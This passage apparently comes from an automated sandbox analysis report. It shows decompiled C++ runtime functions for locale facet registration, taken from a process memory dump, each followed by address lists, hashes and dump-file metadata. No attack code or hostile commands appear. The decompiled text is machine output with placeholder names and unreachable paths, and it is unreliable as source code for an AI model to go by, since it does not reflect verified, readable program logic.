                                                                                                							 *(_t94 - 0x10) = _t86;
                                                                                                							 *(_t94 - 4) = 1;
                                                                                                							E00F85472(_t86);
                                                                                                							 *0xfb81fc();
                                                                                                							 *((intOrPtr*)( *((intOrPtr*)( *_t86 + 4))))();
                                                                                                							 *0xfd0b5c = _t86;
                                                                                                							goto L5;
                                                                                                						}
                                                                                                					} else {
                                                                                                						_t86 = _t89;
                                                                                                						goto L5;
                                                                                                					}
                                                                                                				}
                                                                                                			}











                                                                                                0x00f91644
                                                                                                0x00f9164b
                                                                                                0x00f91655
                                                                                                0x00f9165a
                                                                                                0x00f91665
                                                                                                0x00f91669
                                                                                                0x00f91675
                                                                                                0x00f9167a
                                                                                                0x00f9167e
                                                                                                0x00f916c3
                                                                                                0x00f916c6
                                                                                                0x00f916d2
                                                                                                0x00f91680
                                                                                                0x00f91682
                                                                                                0x00f91688
                                                                                                0x00f9168e
                                                                                                0x00f91696
                                                                                                0x00f91699
                                                                                                0x00f916d3
                                                                                                0x00f916d8
                                                                                                0x00f916d9
                                                                                                0x00f916e0
                                                                                                0x00f916ea
                                                                                                0x00f916ef
                                                                                                0x00f916fa
                                                                                                0x00f916fe
                                                                                                0x00f9170f
                                                                                                0x00f91711
                                                                                                0x00f91713
                                                                                                0x00f91758
                                                                                                0x00f9175b
                                                                                                0x00f91767
                                                                                                0x00f91715
                                                                                                0x00f91715
                                                                                                0x00f91717
                                                                                                0x00f9171d
                                                                                                0x00f91723
                                                                                                0x00f91724
                                                                                                0x00f9172a
                                                                                                0x00f9172b
                                                                                                0x00f9172e
                                                                                                0x00f91768
                                                                                                0x00f9176d
                                                                                                0x00f9176e
                                                                                                0x00f91775
                                                                                                0x00f9177a
                                                                                                0x00f9177c
                                                                                                0x00f91782
                                                                                                0x00f91785
                                                                                                0x00f91788
                                                                                                0x00f91788
                                                                                                0x00f91788
                                                                                                0x00f9178c
                                                                                                0x00f91792
                                                                                                0x00f9179e
                                                                                                0x00f91730
                                                                                                0x00f91730
                                                                                                0x00f91733
                                                                                                0x00f91737
                                                                                                0x00f9173b
                                                                                                0x00f91748
                                                                                                0x00f91750
                                                                                                0x00f91752
                                                                                                0x00000000
                                                                                                0x00f91752
                                                                                                0x00f91719
                                                                                                0x00f91719
                                                                                                0x00000000
                                                                                                0x00f91719
                                                                                                0x00f91717
                                                                                                0x00f9169b
                                                                                                0x00f9169b
                                                                                                0x00f9169e
                                                                                                0x00f916a2
                                                                                                0x00f916a6
                                                                                                0x00f916b3
                                                                                                0x00f916bb
                                                                                                0x00f916bd
                                                                                                0x00000000
                                                                                                0x00f916bd
                                                                                                0x00f91684
                                                                                                0x00f91684
                                                                                                0x00000000
                                                                                                0x00f91684
                                                                                                0x00f91682

                                                                                                APIs
                                                                                                • __EH_prolog3.LIBCMT ref: 00F9164B
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00F91655
                                                                                                  • Part of subcall function 00F789D0: std::_Lockit::_Lockit.LIBCPMT ref: 00F78A00
                                                                                                  • Part of subcall function 00F789D0: std::_Lockit::~_Lockit.LIBCPMT ref: 00F78A28
                                                                                                • std::_Facet_Register.LIBCPMT ref: 00F916A6
                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00F916C6
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                • String ID:
                                                                                                • API String ID: 2854358121-0
                                                                                                • Opcode ID: c76d601355980ff38f1191935e3988ba9fd7a55388f8769d26b6b41e0de36d1d
                                                                                                • Instruction ID: 43f88dc8624bc99fc0472998361626312fb6918e94f126c9b6913b4ed9aeb8aa
                                                                                                • Opcode Fuzzy Hash: c76d601355980ff38f1191935e3988ba9fd7a55388f8769d26b6b41e0de36d1d
                                                                                                • Instruction Fuzzy Hash: 6901C835D0011A9BDF05EB64CC056FD77B5BF84750F58401AE405A7291DF789E05BB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 71%
                                                                                                			E00F87796(void* __edi, void* __esi, void* __eflags, intOrPtr _a8) {
                                                                                                				signed int _v4;
                                                                                                				signed int _v16;
                                                                                                				char _v20;
                                                                                                				signed int _t69;
                                                                                                				void* _t118;
                                                                                                				short* _t172;
                                                                                                				void* _t188;
                                                                                                				signed int _t191;
                                                                                                				signed int _t192;
                                                                                                				signed int _t193;
                                                                                                				signed int _t194;
                                                                                                				signed int _t196;
                                                                                                				signed int _t197;
                                                                                                				signed int _t198;
                                                                                                				signed int _t199;
                                                                                                				signed int _t200;
                                                                                                				short* _t201;
                                                                                                
                                                                                                				_push(8);
                                                                                                				E00FB38B2(0xfb6ebe, __edi, __esi);
                                                                                                				E00F856E6( &_v20, 0);
                                                                                                				_t196 =  *0xfd0af8; // 0x0
                                                                                                				_v4 = _v4 & 0x00000000;
                                                                                                				_v16 = _t196;
                                                                                                				_t69 = E00F78A40(_a8, E00F789D0());
                                                                                                				_t190 = _t69;
                                                                                                				if(_t69 != 0) {
                                                                                                					L5:
                                                                                                					E00F8573E( &_v20);
                                                                                                					return E00FB388C(_t190);
                                                                                                				} else {
                                                                                                					if(_t196 == 0) {
                                                                                                						_push(_a8);
                                                                                                						_push( &_v16);
                                                                                                						__eflags = E00F88AD6(_t190, _t196, __eflags) - 0xffffffff;
                                                                                                						if(__eflags == 0) {
                                                                                                							E00F78FE0(__eflags);
                                                                                                							asm("int3");
                                                                                                							_push(8);
                                                                                                							E00FB38B2(0xfb6ebe, _t190, _t196);
                                                                                                							E00F856E6( &_v20, 0);
                                                                                                							_t197 =  *0xfd0afc; // 0x0
                                                                                                							_v4 = _v4 & 0x00000000;
                                                                                                							_v16 = _t197;
                                                                                                							_t191 = E00F78A40(_a8, E00F789D0());
                                                                                                							__eflags = _t191;
                                                                                                							if(_t191 != 0) {
                                                                                                								L12:
                                                                                                								E00F8573E( &_v20);
                                                                                                								return E00FB388C(_t191);
                                                                                                							} else {
                                                                                                								__eflags = _t197;
                                                                                                								if(__eflags == 0) {
                                                                                                									_push(_a8);
                                                                                                									_push( &_v16);
                                                                                                									__eflags = E00F88B3E(_t188, _t191, _t197, __eflags) - 0xffffffff;
                                                                                                									if(__eflags == 0) {
                                                                                                										E00F78FE0(__eflags);
                                                                                                										asm("int3");
                                                                                                										_push(8);
                                                                                                										E00FB38B2(0xfb6ebe, _t191, _t197);
                                                                                                										E00F856E6( &_v20, 0);
                                                                                                										_t198 =  *0xfd0b18; // 0x0
                                                                                                										_v4 = _v4 & 0x00000000;
                                                                                                										_v16 = _t198;
                                                                                                										_t192 = E00F78A40(_a8, E00F789D0());
                                                                                                										__eflags = _t192;
                                                                                                										if(_t192 != 0) {
                                                                                                											L19:
                                                                                                											E00F8573E( &_v20);
                                                                                                											return E00FB388C(_t192);
                                                                                                										} else {
                                                                                                											__eflags = _t198;
                                                                                                											if(__eflags == 0) {
                                                                                                												_push(_a8);
                                                                                                												_push( &_v16);
                                                                                                												__eflags = E00F88BB9(_t192, _t198, __eflags) - 0xffffffff;
                                                                                                												if(__eflags == 0) {
                                                                                                													E00F78FE0(__eflags);
                                                                                                													asm("int3");
                                                                                                													_push(8);
                                                                                                													E00FB38B2(0xfb6ebe, _t192, _t198);
                                                                                                													E00F856E6( &_v20, 0);
                                                                                                													_t199 =  *0xfd0ae8; // 0x0
                                                                                                													_v4 = _v4 & 0x00000000;
                                                                                                													_v16 = _t199;
                                                                                                													_t193 = E00F78A40(_a8, E00F789D0());
                                                                                                													__eflags = _t193;
                                                                                                													if(_t193 != 0) {
                                                                                                														L26:
                                                                                                														E00F8573E( &_v20);
                                                                                                														return E00FB388C(_t193);
                                                                                                													} else {
                                                                                                														__eflags = _t199;
                                                                                                														if(__eflags == 0) {
                                                                                                															_push(_a8);
                                                                                                															_push( &_v16);
                                                                                                															__eflags = E00F88C25(_t193, _t199, __eflags) - 0xffffffff;
                                                                                                															if(__eflags == 0) {
                                                                                                																E00F78FE0(__eflags);
                                                                                                																asm("int3");
                                                                                                																_push(8);
                                                                                                																E00FB38B2(0xfb6ebe, _t193, _t199);
                                                                                                																E00F856E6( &_v20, 0);
                                                                                                																_t200 =  *0xfd0b1c; // 0x0
                                                                                                																_v4 = _v4 & 0x00000000;
                                                                                                																_v16 = _t200;
                                                                                                																_t194 = E00F78A40(_a8, E00F789D0());
                                                                                                																__eflags = _t194;
                                                                                                																if(_t194 != 0) {
                                                                                                																	L33:
                                                                                                																	E00F8573E( &_v20);
                                                                                                																	return E00FB388C(_t194);
                                                                                                																} else {
                                                                                                																	__eflags = _t200;
                                                                                                																	if(__eflags == 0) {
                                                                                                																		_push(_a8);
                                                                                                																		_push( &_v16);
                                                                                                																		_t118 = E00F88C91(_t194, _t200, __eflags);
                                                                                                																		_pop(_t172);
                                                                                                																		__eflags = _t118 - 0xffffffff;
                                                                                                																		if(__eflags == 0) {
                                                                                                																			E00F78FE0(__eflags);
                                                                                                																			asm("int3");
                                                                                                																			_push(_t200);
                                                                                                																			_t201 = _t172;
                                                                                                																			_t62 = _t201 + 0x10;
                                                                                                																			 *_t62 =  *(_t201 + 0x10) & 0x00000000;
                                                                                                																			__eflags =  *_t62;
                                                                                                																			 *((intOrPtr*)(_t201 + 0x14)) = 7;
                                                                                                																			 *_t201 = 0;
                                                                                                																			E00F8D9F3(_v16);
                                                                                                																			return _t201;
                                                                                                																		} else {
                                                                                                																			_t194 = _v16;
                                                                                                																			_v16 = _t194;
                                                                                                																			_v4 = 1;
                                                                                                																			E00F85472(_t194);
                                                                                                																			 *0xfb81fc();
                                                                                                																			 *((intOrPtr*)( *((intOrPtr*)( *_t194 + 4))))();
                                                                                                																			 *0xfd0b1c = _t194;
                                                                                                																			goto L33;
                                                                                                																		}
                                                                                                																	} else {
                                                                                                																		_t194 = _t200;
                                                                                                																		goto L33;
                                                                                                																	}
                                                                                                																}
                                                                                                															} else {
                                                                                                																_t193 = _v16;
                                                                                                																_v16 = _t193;
                                                                                                																_v4 = 1;
                                                                                                																E00F85472(_t193);
                                                                                                																 *0xfb81fc();
                                                                                                																 *((intOrPtr*)( *((intOrPtr*)( *_t193 + 4))))();
                                                                                                																 *0xfd0ae8 = _t193;
                                                                                                																goto L26;
                                                                                                															}
                                                                                                														} else {
                                                                                                															_t193 = _t199;
                                                                                                															goto L26;
                                                                                                														}
                                                                                                													}
                                                                                                												} else {
                                                                                                													_t192 = _v16;
                                                                                                													_v16 = _t192;
                                                                                                													_v4 = 1;
                                                                                                													E00F85472(_t192);
                                                                                                													 *0xfb81fc();
                                                                                                													 *((intOrPtr*)( *((intOrPtr*)( *_t192 + 4))))();
                                                                                                													 *0xfd0b18 = _t192;
                                                                                                													goto L19;
                                                                                                												}
                                                                                                											} else {
                                                                                                												_t192 = _t198;
                                                                                                												goto L19;
                                                                                                											}
                                                                                                										}
                                                                                                									} else {
                                                                                                										_t191 = _v16;
                                                                                                										_v16 = _t191;
                                                                                                										_v4 = 1;
                                                                                                										E00F85472(_t191);
                                                                                                										 *0xfb81fc();
                                                                                                										 *((intOrPtr*)( *((intOrPtr*)( *_t191 + 4))))();
                                                                                                										 *0xfd0afc = _t191;
                                                                                                										goto L12;
                                                                                                									}
                                                                                                								} else {
                                                                                                									_t191 = _t197;
                                                                                                									goto L12;
                                                                                                								}
                                                                                                							}
                                                                                                						} else {
                                                                                                							_t190 = _v16;
                                                                                                							_v16 = _t190;
                                                                                                							_v4 = 1;
                                                                                                							E00F85472(_t190);
                                                                                                							 *0xfb81fc();
                                                                                                							 *((intOrPtr*)( *((intOrPtr*)( *_t190 + 4))))();
                                                                                                							 *0xfd0af8 = _t190;
                                                                                                							goto L5;
                                                                                                						}
                                                                                                					} else {
                                                                                                						_t190 = _t196;
                                                                                                						goto L5;
                                                                                                					}
                                                                                                				}
                                                                                                			}




















                                                                                                0x00f87796
                                                                                                0x00f8779d
                                                                                                0x00f877a7
                                                                                                0x00f877ac
                                                                                                0x00f877b7
                                                                                                0x00f877bb
                                                                                                0x00f877c7
                                                                                                0x00f877cc
                                                                                                0x00f877d0
                                                                                                0x00f87815
                                                                                                0x00f87818
                                                                                                0x00f87824
                                                                                                0x00f877d2
                                                                                                0x00f877d4
                                                                                                0x00f877da
                                                                                                0x00f877e0
                                                                                                0x00f877e8
                                                                                                0x00f877eb
                                                                                                0x00f87825
                                                                                                0x00f8782a
                                                                                                0x00f8782b
                                                                                                0x00f87832
                                                                                                0x00f8783c
                                                                                                0x00f87841
                                                                                                0x00f8784c
                                                                                                0x00f87850
                                                                                                0x00f87861
                                                                                                0x00f87863
                                                                                                0x00f87865
                                                                                                0x00f878aa
                                                                                                0x00f878ad
                                                                                                0x00f878b9
                                                                                                0x00f87867
                                                                                                0x00f87867
                                                                                                0x00f87869
                                                                                                0x00f8786f
                                                                                                0x00f87875
                                                                                                0x00f8787d
                                                                                                0x00f87880
                                                                                                0x00f878ba
                                                                                                0x00f878bf
                                                                                                0x00f878c0
                                                                                                0x00f878c7
                                                                                                0x00f878d1
                                                                                                0x00f878d6
                                                                                                0x00f878e1
                                                                                                0x00f878e5
                                                                                                0x00f878f6
                                                                                                0x00f878f8
                                                                                                0x00f878fa
                                                                                                0x00f8793f
                                                                                                0x00f87942
                                                                                                0x00f8794e
                                                                                                0x00f878fc
                                                                                                0x00f878fc
                                                                                                0x00f878fe
                                                                                                0x00f87904
                                                                                                0x00f8790a
                                                                                                0x00f87912
                                                                                                0x00f87915
                                                                                                0x00f8794f
                                                                                                0x00f87954
                                                                                                0x00f87955
                                                                                                0x00f8795c
                                                                                                0x00f87966
                                                                                                0x00f8796b
                                                                                                0x00f87976
                                                                                                0x00f8797a
                                                                                                0x00f8798b
                                                                                                0x00f8798d
                                                                                                0x00f8798f
                                                                                                0x00f879d4
                                                                                                0x00f879d7
                                                                                                0x00f879e3
                                                                                                0x00f87991
                                                                                                0x00f87991
                                                                                                0x00f87993
                                                                                                0x00f87999
                                                                                                0x00f8799f
                                                                                                0x00f879a7
                                                                                                0x00f879aa
                                                                                                0x00f879e4
                                                                                                0x00f879e9
                                                                                                0x00f879ea
                                                                                                0x00f879f1
                                                                                                0x00f879fb
                                                                                                0x00f87a00
                                                                                                0x00f87a0b
                                                                                                0x00f87a0f
                                                                                                0x00f87a20
                                                                                                0x00f87a22
                                                                                                0x00f87a24
                                                                                                0x00f87a69
                                                                                                0x00f87a6c
                                                                                                0x00f87a78
                                                                                                0x00f87a26
                                                                                                0x00f87a26
                                                                                                0x00f87a28
                                                                                                0x00f87a2e
                                                                                                0x00f87a34
                                                                                                0x00f87a35
                                                                                                0x00f87a3b
                                                                                                0x00f87a3c
                                                                                                0x00f87a3f
                                                                                                0x00f87a79
                                                                                                0x00f87a7e
                                                                                                0x00f87a82
                                                                                                0x00f87a86
                                                                                                0x00f87a8a
                                                                                                0x00f87a8a
                                                                                                0x00f87a8a
                                                                                                0x00f87a8e
                                                                                                0x00f87a95
                                                                                                0x00f87a98
                                                                                                0x00f87aa1
                                                                                                0x00f87a41
                                                                                                0x00f87a41
                                                                                                0x00f87a44
                                                                                                0x00f87a48
                                                                                                0x00f87a4c
                                                                                                0x00f87a59
                                                                                                0x00f87a61
                                                                                                0x00f87a63
                                                                                                0x00000000
                                                                                                0x00f87a63
                                                                                                0x00f87a2a
                                                                                                0x00f87a2a
                                                                                                0x00000000
                                                                                                0x00f87a2a
                                                                                                0x00f87a28
                                                                                                0x00f879ac
                                                                                                0x00f879ac
                                                                                                0x00f879af
                                                                                                0x00f879b3
                                                                                                0x00f879b7
                                                                                                0x00f879c4
                                                                                                0x00f879cc
                                                                                                0x00f879ce
                                                                                                0x00000000
                                                                                                0x00f879ce
                                                                                                0x00f87995
                                                                                                0x00f87995
                                                                                                0x00000000
                                                                                                0x00f87995
                                                                                                0x00f87993
                                                                                                0x00f87917
                                                                                                0x00f87917
                                                                                                0x00f8791a
                                                                                                0x00f8791e
                                                                                                0x00f87922
                                                                                                0x00f8792f
                                                                                                0x00f87937
                                                                                                0x00f87939
                                                                                                0x00000000
                                                                                                0x00f87939
                                                                                                0x00f87900
                                                                                                0x00f87900
                                                                                                0x00000000
                                                                                                0x00f87900
                                                                                                0x00f878fe
                                                                                                0x00f87882
                                                                                                0x00f87882
                                                                                                0x00f87885
                                                                                                0x00f87889
                                                                                                0x00f8788d
                                                                                                0x00f8789a
                                                                                                0x00f878a2
                                                                                                0x00f878a4
                                                                                                0x00000000
                                                                                                0x00f878a4
                                                                                                0x00f8786b
                                                                                                0x00f8786b
                                                                                                0x00000000
                                                                                                0x00f8786b
                                                                                                0x00f87869
                                                                                                0x00f877ed
                                                                                                0x00f877ed
                                                                                                0x00f877f0
                                                                                                0x00f877f4
                                                                                                0x00f877f8
                                                                                                0x00f87805
                                                                                                0x00f8780d
                                                                                                0x00f8780f
                                                                                                0x00000000
                                                                                                0x00f8780f
                                                                                                0x00f877d6
                                                                                                0x00f877d6
                                                                                                0x00000000
                                                                                                0x00f877d6
                                                                                                0x00f877d4

                                                                                                APIs
                                                                                                • __EH_prolog3.LIBCMT ref: 00F8779D
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00F877A7
                                                                                                  • Part of subcall function 00F789D0: std::_Lockit::_Lockit.LIBCPMT ref: 00F78A00
                                                                                                  • Part of subcall function 00F789D0: std::_Lockit::~_Lockit.LIBCPMT ref: 00F78A28
                                                                                                • std::_Facet_Register.LIBCPMT ref: 00F877F8
                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00F87818
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                • String ID:
                                                                                                • API String ID: 2854358121-0
                                                                                                • Opcode ID: ad37213edd688a541407aa3796a5c1125d23e877d2b69d6e52abf1f2645cb44a
                                                                                                • Instruction ID: 0aa86430881dd01616e432f80398730fa8f0aa6e56f5c33af3ce023498b94db5
                                                                                                • Opcode Fuzzy Hash: ad37213edd688a541407aa3796a5c1125d23e877d2b69d6e52abf1f2645cb44a
                                                                                                • Instruction Fuzzy Hash: 9601A1359442199BCB04FB64CC457EE7771AF84760F24411AF411AB291DF78DE02FB92
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 71%
                                                                                                			E00F87701(void* __edi, void* __esi, void* __eflags, intOrPtr _a8) {
                                                                                                				signed int _v4;
                                                                                                				signed int _v16;
                                                                                                				char _v20;
                                                                                                				signed int _t81;
                                                                                                				void* _t141;
                                                                                                				short* _t205;
                                                                                                				void* _t224;
                                                                                                				signed int _t227;
                                                                                                				signed int _t228;
                                                                                                				signed int _t229;
                                                                                                				signed int _t230;
                                                                                                				signed int _t231;
                                                                                                				signed int _t233;
                                                                                                				signed int _t234;
                                                                                                				signed int _t235;
                                                                                                				signed int _t236;
                                                                                                				signed int _t237;
                                                                                                				signed int _t238;
                                                                                                				short* _t239;
                                                                                                
                                                                                                				_push(8);
                                                                                                				E00FB38B2(0xfb6ebe, __edi, __esi);
                                                                                                				E00F856E6( &_v20, 0);
                                                                                                				_t233 =  *0xfd0af4; // 0x0
                                                                                                				_v4 = _v4 & 0x00000000;
                                                                                                				_v16 = _t233;
                                                                                                				_t81 = E00F78A40(_a8, E00F789D0());
                                                                                                				_t226 = _t81;
                                                                                                				if(_t81 != 0) {
                                                                                                					L5:
                                                                                                					E00F8573E( &_v20);
                                                                                                					return E00FB388C(_t226);
                                                                                                				} else {
                                                                                                					if(_t233 == 0) {
                                                                                                						_push(_a8);
                                                                                                						_push( &_v16);
                                                                                                						__eflags = E00F88A6E(_t226, _t233, __eflags) - 0xffffffff;
                                                                                                						if(__eflags == 0) {
                                                                                                							E00F78FE0(__eflags);
                                                                                                							asm("int3");
                                                                                                							_push(8);
                                                                                                							E00FB38B2(0xfb6ebe, _t226, _t233);
                                                                                                							E00F856E6( &_v20, 0);
                                                                                                							_t234 =  *0xfd0af8; // 0x0
                                                                                                							_v4 = _v4 & 0x00000000;
                                                                                                							_v16 = _t234;
                                                                                                							_t227 = E00F78A40(_a8, E00F789D0());
                                                                                                							__eflags = _t227;
                                                                                                							if(_t227 != 0) {
                                                                                                								L12:
                                                                                                								E00F8573E( &_v20);
                                                                                                								return E00FB388C(_t227);
                                                                                                							} else {
                                                                                                								__eflags = _t234;
                                                                                                								if(__eflags == 0) {
                                                                                                									_push(_a8);
                                                                                                									_push( &_v16);
                                                                                                									__eflags = E00F88AD6(_t227, _t234, __eflags) - 0xffffffff;
                                                                                                									if(__eflags == 0) {
                                                                                                										E00F78FE0(__eflags);
                                                                                                										asm("int3");
                                                                                                										_push(8);
                                                                                                										E00FB38B2(0xfb6ebe, _t227, _t234);
                                                                                                										E00F856E6( &_v20, 0);
                                                                                                										_t235 =  *0xfd0afc; // 0x0
                                                                                                										_v4 = _v4 & 0x00000000;
                                                                                                										_v16 = _t235;
                                                                                                										_t228 = E00F78A40(_a8, E00F789D0());
                                                                                                										__eflags = _t228;
                                                                                                										if(_t228 != 0) {
                                                                                                											L19:
                                                                                                											E00F8573E( &_v20);
                                                                                                											return E00FB388C(_t228);
                                                                                                										} else {
                                                                                                											__eflags = _t235;
                                                                                                											if(__eflags == 0) {
                                                                                                												_push(_a8);
                                                                                                												_push( &_v16);
                                                                                                												__eflags = E00F88B3E(_t224, _t228, _t235, __eflags) - 0xffffffff;
                                                                                                												if(__eflags == 0) {
                                                                                                													E00F78FE0(__eflags);
                                                                                                													asm("int3");
                                                                                                													_push(8);
                                                                                                													E00FB38B2(0xfb6ebe, _t228, _t235);
                                                                                                													E00F856E6( &_v20, 0);
                                                                                                													_t236 =  *0xfd0b18; // 0x0
                                                                                                													_v4 = _v4 & 0x00000000;
                                                                                                													_v16 = _t236;
                                                                                                													_t229 = E00F78A40(_a8, E00F789D0());
                                                                                                													__eflags = _t229;
                                                                                                													if(_t229 != 0) {
                                                                                                														L26:
                                                                                                														E00F8573E( &_v20);
                                                                                                														return E00FB388C(_t229);
                                                                                                													} else {
                                                                                                														__eflags = _t236;
                                                                                                														if(__eflags == 0) {
                                                                                                															_push(_a8);
                                                                                                															_push( &_v16);
                                                                                                															__eflags = E00F88BB9(_t229, _t236, __eflags) - 0xffffffff;
                                                                                                															if(__eflags == 0) {
                                                                                                																E00F78FE0(__eflags);
                                                                                                																asm("int3");
                                                                                                																_push(8);
                                                                                                																E00FB38B2(0xfb6ebe, _t229, _t236);
                                                                                                																E00F856E6( &_v20, 0);
                                                                                                																_t237 =  *0xfd0ae8; // 0x0
                                                                                                																_v4 = _v4 & 0x00000000;
                                                                                                																_v16 = _t237;
                                                                                                																_t230 = E00F78A40(_a8, E00F789D0());
                                                                                                																__eflags = _t230;
                                                                                                																if(_t230 != 0) {
                                                                                                																	L33:
                                                                                                																	E00F8573E( &_v20);
                                                                                                																	return E00FB388C(_t230);
                                                                                                																} else {
                                                                                                																	__eflags = _t237;
                                                                                                																	if(__eflags == 0) {
                                                                                                																		_push(_a8);
                                                                                                																		_push( &_v16);
                                                                                                																		__eflags = E00F88C25(_t230, _t237, __eflags) - 0xffffffff;
                                                                                                																		if(__eflags == 0) {
                                                                                                																			E00F78FE0(__eflags);
                                                                                                																			asm("int3");
                                                                                                																			_push(8);
                                                                                                																			E00FB38B2(0xfb6ebe, _t230, _t237);
                                                                                                																			E00F856E6( &_v20, 0);
                                                                                                																			_t238 =  *0xfd0b1c; // 0x0
                                                                                                																			_v4 = _v4 & 0x00000000;
                                                                                                																			_v16 = _t238;
                                                                                                																			_t231 = E00F78A40(_a8, E00F789D0());
                                                                                                																			__eflags = _t231;
                                                                                                																			if(_t231 != 0) {
                                                                                                																				L40:
                                                                                                																				E00F8573E( &_v20);
                                                                                                																				return E00FB388C(_t231);
                                                                                                																			} else {
                                                                                                																				__eflags = _t238;
                                                                                                																				if(__eflags == 0) {
                                                                                                																					_push(_a8);
                                                                                                																					_push( &_v16);
                                                                                                																					_t141 = E00F88C91(_t231, _t238, __eflags);
                                                                                                																					_pop(_t205);
                                                                                                																					__eflags = _t141 - 0xffffffff;
                                                                                                																					if(__eflags == 0) {
                                                                                                																						E00F78FE0(__eflags);
                                                                                                																						asm("int3");
                                                                                                																						_push(_t238);
                                                                                                																						_t239 = _t205;
                                                                                                																						_t74 = _t239 + 0x10;
                                                                                                																						 *_t74 =  *(_t239 + 0x10) & 0x00000000;
                                                                                                																						__eflags =  *_t74;
                                                                                                																						 *((intOrPtr*)(_t239 + 0x14)) = 7;
                                                                                                																						 *_t239 = 0;
                                                                                                																						E00F8D9F3(_v20);
                                                                                                																						return _t239;
                                                                                                																					} else {
                                                                                                																						_t231 = _v16;
                                                                                                																						_v16 = _t231;
                                                                                                																						_v4 = 1;
                                                                                                																						E00F85472(_t231);
                                                                                                																						 *0xfb81fc();
                                                                                                																						 *((intOrPtr*)( *((intOrPtr*)( *_t231 + 4))))();
                                                                                                																						 *0xfd0b1c = _t231;
                                                                                                																						goto L40;
                                                                                                																					}
                                                                                                																				} else {
                                                                                                																					_t231 = _t238;
                                                                                                																					goto L40;
                                                                                                																				}
                                                                                                																			}
                                                                                                																		} else {
                                                                                                																			_t230 = _v16;
                                                                                                																			_v16 = _t230;
                                                                                                																			_v4 = 1;
                                                                                                																			E00F85472(_t230);
                                                                                                																			 *0xfb81fc();
                                                                                                																			 *((intOrPtr*)( *((intOrPtr*)( *_t230 + 4))))();
                                                                                                																			 *0xfd0ae8 = _t230;
                                                                                                																			goto L33;
                                                                                                																		}
                                                                                                																	} else {
                                                                                                																		_t230 = _t237;
                                                                                                																		goto L33;
                                                                                                																	}
                                                                                                																}
                                                                                                															} else {
                                                                                                																_t229 = _v16;
                                                                                                																_v16 = _t229;
                                                                                                																_v4 = 1;
                                                                                                																E00F85472(_t229);
                                                                                                																 *0xfb81fc();
                                                                                                																 *((intOrPtr*)( *((intOrPtr*)( *_t229 + 4))))();
                                                                                                																 *0xfd0b18 = _t229;
                                                                                                																goto L26;
                                                                                                															}
                                                                                                														} else {
                                                                                                															_t229 = _t236;
                                                                                                															goto L26;
                                                                                                														}
                                                                                                													}
                                                                                                												} else {
                                                                                                													_t228 = _v16;
                                                                                                													_v16 = _t228;
                                                                                                													_v4 = 1;
                                                                                                													E00F85472(_t228);
                                                                                                													 *0xfb81fc();
                                                                                                													 *((intOrPtr*)( *((intOrPtr*)( *_t228 + 4))))();
                                                                                                													 *0xfd0afc = _t228;
                                                                                                													goto L19;
                                                                                                												}
                                                                                                											} else {
                                                                                                												_t228 = _t235;
                                                                                                												goto L19;
                                                                                                											}
                                                                                                										}
                                                                                                									} else {
                                                                                                										_t227 = _v16;
                                                                                                										_v16 = _t227;
                                                                                                										_v4 = 1;
                                                                                                										E00F85472(_t227);
                                                                                                										 *0xfb81fc();
                                                                                                										 *((intOrPtr*)( *((intOrPtr*)( *_t227 + 4))))();
                                                                                                										 *0xfd0af8 = _t227;
                                                                                                										goto L12;
                                                                                                									}
                                                                                                								} else {
                                                                                                									_t227 = _t234;
                                                                                                									goto L12;
                                                                                                								}
                                                                                                							}
                                                                                                						} else {
                                                                                                							_t226 = _v16;
                                                                                                							_v16 = _t226;
                                                                                                							_v4 = 1;
                                                                                                							E00F85472(_t226);
                                                                                                							 *0xfb81fc();
                                                                                                							 *((intOrPtr*)( *((intOrPtr*)( *_t226 + 4))))();
                                                                                                							 *0xfd0af4 = _t226;
                                                                                                							goto L5;
                                                                                                						}
                                                                                                					} else {
                                                                                                						_t226 = _t233;
                                                                                                						goto L5;
                                                                                                					}
                                                                                                				}
                                                                                                			}






















                                                                                                0x00f87701
                                                                                                0x00f87708
                                                                                                0x00f87712
                                                                                                0x00f87717
                                                                                                0x00f87722
                                                                                                0x00f87726
                                                                                                0x00f87732
                                                                                                0x00f87737
                                                                                                0x00f8773b
                                                                                                0x00f87780
                                                                                                0x00f87783
                                                                                                0x00f8778f
                                                                                                0x00f8773d
                                                                                                0x00f8773f
                                                                                                0x00f87745
                                                                                                0x00f8774b
                                                                                                0x00f87753
                                                                                                0x00f87756
                                                                                                0x00f87790
                                                                                                0x00f87795
                                                                                                0x00f87796
                                                                                                0x00f8779d
                                                                                                0x00f877a7
                                                                                                0x00f877ac
                                                                                                0x00f877b7
                                                                                                0x00f877bb
                                                                                                0x00f877cc
                                                                                                0x00f877ce
                                                                                                0x00f877d0
                                                                                                0x00f87815
                                                                                                0x00f87818
                                                                                                0x00f87824
                                                                                                0x00f877d2
                                                                                                0x00f877d2
                                                                                                0x00f877d4
                                                                                                0x00f877da
                                                                                                0x00f877e0
                                                                                                0x00f877e8
                                                                                                0x00f877eb
                                                                                                0x00f87825
